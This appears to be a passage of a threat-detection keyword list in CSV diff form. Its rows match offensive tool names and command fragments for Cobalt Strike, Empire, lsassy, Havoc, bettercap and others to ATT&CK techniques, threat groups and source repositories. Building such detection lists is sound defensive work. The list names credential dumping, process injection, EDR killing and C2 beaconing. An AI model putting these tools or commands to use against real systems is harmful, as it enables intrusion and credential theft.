+"*dllinject *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*dllinject.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*-DllInjection.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*dllKitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*DllLdr.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*dllload *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Dll-Loader -http -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*Dll-Loader -local -path*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. 
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*Dll-Loader -smb -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*DllLoaderLoader.exe*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z"
+"*-DllName *-Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*DllNotificationInjection.cpp*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
+"*DllNotificationInjection.exe*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
+"*DllNotificationInjection.sln*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
+"*DllNotificationInjection.vcxproj*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
+"*DllNotificationInjection-master*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
+"*dllproxy.py*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z"
+"*DllProxy-main*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation 
Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z"
+"*dllsearcher *.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*dmcxblue/SharpBlackout*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z"
+"*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z"
+"*dmg2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*DNet-EnumerateAllDomainUserAccounts*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration 
tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
+"*DNet-ListAccountsByDescription*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
+"*DNet-ListDomainUserAccountsWithCompletedADDescription*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
+"*DNet-ListUsersInDomainAdminsGroup*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
+"*dnf install tor -y*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*dns.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*dns.spoof.address*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*dns.spoof.all*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*dns.spoof.domains*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network 
Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*dns.spoof.hosts*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*dns_beacon_beacon*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*dns_beacon_dns_idle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
+"*dns_beacon_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_dns_ttl*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_get_A*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_get_TXT*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
